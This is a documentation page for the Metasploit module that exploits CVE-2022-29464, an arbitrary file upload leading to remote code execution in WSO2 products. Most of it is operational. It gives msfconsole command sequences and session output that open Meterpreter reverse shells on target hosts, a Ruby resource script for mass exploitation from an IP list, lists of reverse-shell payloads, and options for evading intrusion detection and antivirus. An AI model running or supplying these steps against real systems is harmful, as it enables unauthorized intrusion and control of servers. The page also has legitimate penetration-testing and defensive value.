WSO2 Arbitrary File Upload to RCE - Metasploit


This page contains detailed information about how to use the exploit/multi/http/wso2_file_upload_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: WSO2 Arbitrary File Upload to RCE
Module: exploit/multi/http/wso2_file_upload_rce
Source code: modules/exploits/multi/http/wso2_file_upload_rce.rb
Disclosure date: 2022-04-01
Last modification time: 2022-05-13 09:16:01 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888, 9443
List of CVEs: CVE-2022-29464

This module abuses a vulnerability in certain WSO2 products that allow unrestricted file upload with resultant remote code execution. This affects WSO2 API Manager 2.2.0 and above through 4.0.0; WSO2 Identity Server 5.2.0 and above through 5.11.0; WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0; WSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0; and WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
  • artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.

Basic Usage


Using wso2_file_upload_rce against a single host

Normally, you can use exploit/multi/http/wso2_file_upload_rce this way:

msf > use exploit/multi/http/wso2_file_upload_rce
msf exploit(wso2_file_upload_rce) > show targets
    ... a list of targets ...
msf exploit(wso2_file_upload_rce) > set TARGET target-id
msf exploit(wso2_file_upload_rce) > show options
    ... show and set options ...
msf exploit(wso2_file_upload_rce) > exploit

Using wso2_file_upload_rce against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your wso2_file_upload_rce will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/multi/http/wso2_file_upload_rce")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

Knowledge Base


Vulnerable Application


Certain WSO2 products allow unrestricted file upload with resultant remote code execution. This affects WSO2 API Manager 2.2.0 and above through 4.0.0; WSO2 Identity Server 5.2.0 and above through 5.11.0; WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0; WSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0; and WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0.

Download WSO2 API Manager 4.0.0 or another version < 4.1.0 from the same link.

Download and install JDK 1.8 and set $JAVA_HOME in your environment.

Start the vulnerable application with ./wso2am-4.0.0/bin/api-manager.sh. More information on target setup can be found here.

Verification Steps


  1. Install the application
  2. Start msfconsole
  3. Do: use multi/http/wso2_file_upload_rce
  4. Do: set rhosts [ip]
  5. Do: set lhost [ip]
  6. Do: run
  7. You should get a shell.

Scenarios


WSO2 API Manager 4.0.0 on Ubuntu 20.04.1

msf6 > use multi/http/wso2_file_upload_rce
[*] Using configured payload java/meterpreter/reverse_tcp
msf6 exploit(multi/http/wso2_file_upload_rce) > set rhosts 172.16.199.173
rhosts => 172.16.199.173
msf6 exploit(multi/http/wso2_file_upload_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/http/wso2_file_upload_rce) > check
[*] 172.16.199.173:9443 - The target appears to be vulnerable.
msf6 exploit(multi/http/wso2_file_upload_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Preparing payload...
[*] Uploading payload...
[+] Payload uploaded successfully
[*] Executing payload...
[*] Waiting for shell... 
[*] Waiting for shell... 
[*] Waiting for shell... 
[*] Waiting for shell... 
[*] Sending stage (58851 bytes) to 172.16.199.173
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.173:34282 ) at 2022-04-26 10:58:31 -0700

meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo
Computer        : ubuntu
OS              : Linux 5.13.0-40-generic (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/linux

WSO2 API Manager 3.0.0 on Ubuntu 20.04.1

msf6 > use multi/http/wso2_file_upload_rce
msf6 exploit(multi/http/wso2_file_upload_rce) > set rhosts 172.16.199.173
rhosts => 172.16.199.173
msf6 exploit(multi/http/wso2_file_upload_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/http/wso2_file_upload_rce) > check
[*] 172.16.199.173:9443 - The target appears to be vulnerable.
msf6 exploit(multi/http/wso2_file_upload_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Preparing payload...
[*] Uploading payload...
[+] Payload uploaded successfully
[*] Executing payload...
[*] Waiting for shell... 
[*] Waiting for shell... 
[*] Waiting for shell... 
[*] Waiting for shell... 
[*] Sending stage (58851 bytes) to 172.16.199.173
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.173:33564 ) at 2022-04-26 12:09:18 -0700

meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo
Computer        : ubuntu
OS              : Linux 5.13.0-40-generic (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/linux

Go back to menu.

Msfconsole Usage


Here is how the multi/http/wso2_file_upload_rce exploit module looks in the msfconsole:

msf6 > use exploit/multi/http/wso2_file_upload_rce

[*] Using configured payload java/meterpreter/reverse_tcp
msf6 exploit(multi/http/wso2_file_upload_rce) > show info

       Name: WSO2 Arbitrary File Upload to RCE
     Module: exploit/multi/http/wso2_file_upload_rce
   Platform: 
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2022-04-01

Provided by:
  Orange Tsai
  hakivvi
  wvu <[email protected]>
  Jack Heysel <[email protected]>

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Java Dropper

Check supported:
  Yes

Basic options:
  Name              Current Setting  Required  Description
  ----              ---------------  --------  -----------
  Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT             9443             yes       The target port (TCP)
  SSL               true             no        Negotiate SSL/TLS for outgoing connections
  TARGETURI         /                yes       Relative URI of WSO2 product installation
  VHOST                              no        HTTP server virtual host
  WAR_DEPLOY_DELAY  20               yes       How long to wait for the war file to deploy, in seconds

Payload information:

Description:
  This module abuses a vulnerability in certain WSO2 products that 
  allow unrestricted file upload with resultant remote code execution. 
  This affects WSO2 API Manager 2.2.0 and above through 4.0.0; WSO2 
  Identity Server 5.2.0 and above through 5.11.0; WSO2 Identity Server 
  Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0; WSO2 Identity Server as 
  Key Manager 5.3.0 and above through 5.10.0; and WSO2 Enterprise 
  Integrator 6.2.0 and above through 6.6.0.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2022-29464
  https://github.com/hakivvi/CVE-2022-29464
  https://twitter.com/wvuuuuuuuuuuuuu/status/1517433974003576833
  https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1738

Module Options


This is a complete list of options available in the multi/http/wso2_file_upload_rce exploit:

msf6 exploit(multi/http/wso2_file_upload_rce) > show options

Module options (exploit/multi/http/wso2_file_upload_rce):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT             9443             yes       The target port (TCP)
   SSL               true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI         /                yes       Relative URI of WSO2 product installation
   VHOST                              no        HTTP server virtual host
   WAR_DEPLOY_DELAY  20               yes       How long to wait for the war file to deploy, in seconds

Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Java Dropper

Advanced Options


Here is a complete list of advanced options supported by the multi/http/wso2_file_upload_rce exploit:

msf6 exploit(multi/http/wso2_file_upload_rce) > show advanced

Module advanced options (exploit/multi/http/wso2_file_upload_rce):

   Name                    Current Setting                          Required  Description
   ----                    ---------------                          --------  -----------
   AllowNoCleanup          false                                    no        Allow exploitation without the possibility of cleaning up files
   AutoCheck               true                                     no        Run check before exploit
   ContextInformationFile                                           no        The information file that contains context information
   DOMAIN                  WORKSTATION                              yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                     no        Conform to IIS, should work for most servers. Only set to false for non
                                                                              -IIS servers
   DisablePayloadHandler   false                                    no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                    no        Use transient context when encoding payloads
   FileDropperDelay                                                 no        Delay in seconds before attempting cleanup
   FingerprintCheck        true                                     no        Conduct a pre-exploit fingerprint verification
   ForceExploit            false                                    no        Override check result
   HttpClientTimeout                                                no        HTTP connection and receive timeout
   HttpPassword                                                     no        The HTTP password to specify for authentication
   HttpRawHeaders                                                   no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                    no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                  no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                    no        Show HTTP headers only in HttpTrace
   HttpUsername                                                     no        The HTTP username to specify for authentication
   SSLVersion              Auto                                     yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto
                                                                              -negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/5.0 (Macintosh; Intel Mac OS X   no        The User-Agent header to use for all requests
                           12.2; rv:97.0) Gecko/20100101 Firefox/9
                           7.0
   VERBOSE                 false                                    no        Enable detailed status messages
   WORKSPACE                                                        no        Specify the workspace for this module
   WfsDelay                10                                       no        Additional delay in seconds to wait for a session

Payload advanced options (java/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AESPassword                                   no        Password for encrypting communication
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   JavaMeterpreterDebug         false            no        Run the payload in debug mode, with logging enabled
   MeterpreterDebugBuild        false            no        Use a debug version of Meterpreter
   MeterpreterDebugLogging                       no        The Meterpreter debug logging configuration, see https://github.com/rapid7/metasploit-fram
                                                           ework/wiki/Meterpreter-Debugging-Meterpreter-Sessions
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but
                                                           directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   Spawn                        2                yes       Number of subprocesses to spawn
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/http/wso2_file_upload_rce module can exploit:

msf6 exploit(multi/http/wso2_file_upload_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Java Dropper

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/wso2_file_upload_rce exploit:

msf6 exploit(multi/http/wso2_file_upload_rce) > show payloads

Compatible Payloads
===================

   #   Name                                     Disclosure Date  Rank    Check  Description
   -   ----                                     ---------------  ----    -----  -----------
   0   payload/generic/custom                                    normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                            normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                         normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/generic/ssh/interact                              normal  No     Interact with Established SSH Connection
   4   payload/java/jsp_shell_bind_tcp                           normal  No     Java JSP Command Shell, Bind TCP Inline
   5   payload/java/jsp_shell_reverse_tcp                        normal  No     Java JSP Command Shell, Reverse TCP Inline
   6   payload/java/meterpreter/bind_tcp                         normal  No     Java Meterpreter, Java Bind TCP Stager
   7   payload/java/meterpreter/reverse_http                     normal  No     Java Meterpreter, Java Reverse HTTP Stager
   8   payload/java/meterpreter/reverse_https                    normal  No     Java Meterpreter, Java Reverse HTTPS Stager
   9   payload/java/meterpreter/reverse_tcp                      normal  No     Java Meterpreter, Java Reverse TCP Stager
   10  payload/java/shell/bind_tcp                               normal  No     Command Shell, Java Bind TCP Stager
   11  payload/java/shell/reverse_tcp                            normal  No     Command Shell, Java Reverse TCP Stager
   12  payload/java/shell_reverse_tcp                            normal  No     Java Command Shell, Reverse TCP Inline
   13  payload/multi/meterpreter/reverse_http                    normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   14  payload/multi/meterpreter/reverse_https                   normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)

Evasion Options


Here is the full list of possible evasion options supported by the multi/http/wso2_file_upload_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/http/wso2_file_upload_rce) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-no
                                                            rmal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Payload upload attempt failed


Here is a relevant code snippet related to the "Payload upload attempt failed" error message:

106:	      'data' => post_data.to_s
107:	    )
108:	    if res && res.code == 200
109:	      print_good('Payload uploaded successfully')
110:	    else
111:	      fail_with(Failure::UnexpectedReply, 'Payload upload attempt failed')
112:	    end
113:	  end
114:	
115:	  def execute_payload(app_name)
116:	    res = nil

Payload execution attempt failed


Here is a relevant code snippet related to the "Payload execution attempt failed" error message:

129:	    end
130:	
131:	    if res && res.code == 200
132:	      print_good('Payload executed successfully')
133:	    else
134:	      fail_with(Failure::UnexpectedReply, 'Payload execution attempt failed')
135:	    end
136:	  end
137:	
138:	  # Retry the block until it returns a truthy value. Each iteration attempt will
139:	  # be performed with expoential backoff. If the timeout period surpasses, false is returned.

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Orange Tsai
  • hakivvi
  • wvu
  • Jack Heysel <jack_heysel[at]rapid7.com>

Version


This page has been produced using Metasploit Framework version 6.2.4-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.